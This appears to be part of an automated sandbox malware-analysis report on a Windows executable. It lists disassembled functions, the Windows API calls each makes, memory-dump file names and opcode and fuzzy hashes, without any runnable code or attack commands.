Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45

Function 00406EAF Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45

Function 00406DFB Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45

Function 004032DE Relevance: 4.6, APIs: 3, Instructions: 101COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 004032F2

Part of subcall function 0040345D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 00403325
SetFilePointer.KERNELBASE(000053CA,00000000,00000000,00414ED0,00004000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000), ref: 00403420

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: FilePointer$CountTick
String ID:
API String ID: 1092082344-0
Opcode ID: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
Instruction ID: a2c2ae871b20a7f651e14226ae934804f023725c52e887911cb1b1382089a511
Opcode Fuzzy Hash: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
Instruction Fuzzy Hash: 54313872610215DBD721DF29EEC496A3BA9F74039A754433FE900F62E0CBB99D018B9D

Function 00402032 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040205D

Part of subcall function 00405450: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
Part of subcall function 00405450: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,00402F08,00402F08,Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,00000000,00000000,00000000), ref: 004054AB
Part of subcall function 00405450: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll), ref: 004054BD
Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040206E
FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020EB

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: 063e47513c4376f19a5a3bfc0780f7f4b653f4b7b25b96f5c752c2c38872185d
Instruction ID: 38390b8595ebf5dc4f6cf14c4d4b7ed92d06cc21542818b97b262269bef072d5
Opcode Fuzzy Hash: 063e47513c4376f19a5a3bfc0780f7f4b653f4b7b25b96f5c752c2c38872185d
Instruction Fuzzy Hash: DC218331D00215BACF20AFA5CE4D99E7A70BF04358F60413BF511B51E0DBBD8991DA6E

Function 004031D6 Relevance: 3.1, APIs: 2, Instructions: 88COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 004031FB

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
Instruction ID: f938e70baf20f89fc7421c1cbc4d65c8cbb1a4a40291e2e844035b0cdbff1196
Opcode Fuzzy Hash: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
Instruction Fuzzy Hash: 53314B30200219BBDB109F95ED84ADA3E68EB04759F20857EF905E62D0D6789A509BA9

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
Instruction ID: 4945fb4554c9d48a14a82d28c5fc4c127f2c3d85d8aa5c2a63fae023cf5e702c
Opcode Fuzzy Hash: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
Instruction Fuzzy Hash: AB01F431724210EBEB199B789D04B2A3698E710714F104A7FF855F62F1DA78CC529B5D

Function 0040238E Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
RegCloseKey.ADVAPI32(00000000), ref: 004023B9

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
Instruction ID: 92c71ce55c792e737e0c56b3c5c8c262173643586798c2a655fc457b9e75749a
Opcode Fuzzy Hash: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
Instruction Fuzzy Hash: 5FF0F632E041109BE700BBA49B8EABE72A49B44314F29003FFE42F31C0CAF85D42976D

Function 00401E49 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401E67
EnableWindow.USER32(00000000,00000000), ref: 00401E72

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
Instruction ID: b41365517dadb09c69eaf87789fd34eb77fb4a5ff64ddc4fb458d6156a5e0ce1
Opcode Fuzzy Hash: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
Instruction Fuzzy Hash: DFE0DF32E08200CFE724EFA5AA494AD77B4EB80324B20847FF201F11D1CE7858818F6E

Function 004067C2 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
GetProcAddress.KERNEL32(00000000,?), ref: 004067EF

Part of subcall function 00406752: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
Part of subcall function 00406752: wsprintfW.USER32 ref: 004067A4
Part of subcall function 00406752: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
Instruction ID: 7b80e99db610fb1a261844a57c40f0e669857592e3492eb3b2a0c0f7ce0b312d
Opcode Fuzzy Hash: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
Instruction Fuzzy Hash: 14E086325042115BD21057745E48D3762AC9AC4704307843EF556F3041DB78DC35B66E

Function 00405EDE Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\ix8kxoBHDb.exe,80000000,00000003), ref: 00405EE2
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15

Function 0040599C Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403498,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,756F3420,004036EF,?,00000006,00000008,0000000A), ref: 004059A2
GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004059B0

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
Instruction ID: 01a40f06620425e1c555583f7199589d3835b04f5715874dbca4219b9923c3a9
Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
Instruction Fuzzy Hash: D6C04C71216502DAF7115F31DF09B177A50AB60751F11843AA146E11A4DA349455D92D

Function 73B02AAC Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(00000000), ref: 73B02B6B

Memory Dump Source

Source File: 00000000.00000002.1483517567.0000000073B01000.00000020.00000001.01000000.00000005.sdmp, Offset: 73B00000, based on PE: true

Associated: 00000000.00000002.1483495722.0000000073B00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1483809646.0000000073B04000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1483843847.0000000073B06000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73b00000_ix8kxoBHDb.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 48872020de229a62096ca7b00bfccc01523ba1e4591b89c127ca9cc5ae31f5b5
Instruction ID: 7f286b886bda2714a3e7c0fbf3f200766512b9af107a57fef57316454cad9111
Opcode Fuzzy Hash: 48872020de229a62096ca7b00bfccc01523ba1e4591b89c127ca9cc5ae31f5b5
Instruction Fuzzy Hash: DC4160F240420CDFEB31EF65DB8175E3B69FB14358F305436E5099F950EA3998888B91

Function 0040167B Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON

Download Yara Rule

APIs

MoveFileW.KERNEL32(00000000,00000000), ref: 00401696

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
Instruction ID: 73a88bd3a5ced7927151e6ebce11b30d6a6a5b8b2c4e1db0cab765602213b928
Opcode Fuzzy Hash: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
Instruction Fuzzy Hash: CBF09031A0851197DF10BBA54F4DD5E22509B8236CB28073BB412B21E1DAFDC542A56E

Function 004027EF Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D

Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
Instruction ID: 7217e66a6bf97858787bec6454aeb19e768c89e60d383eb7a66a1db5dd3d6cef
Opcode Fuzzy Hash: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
Instruction Fuzzy Hash: 8BE06D71E00104ABD710DBA5AE098AEB7B8DB84308B60403BF601B10D0CA7959518E2E

Function 0040230C Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
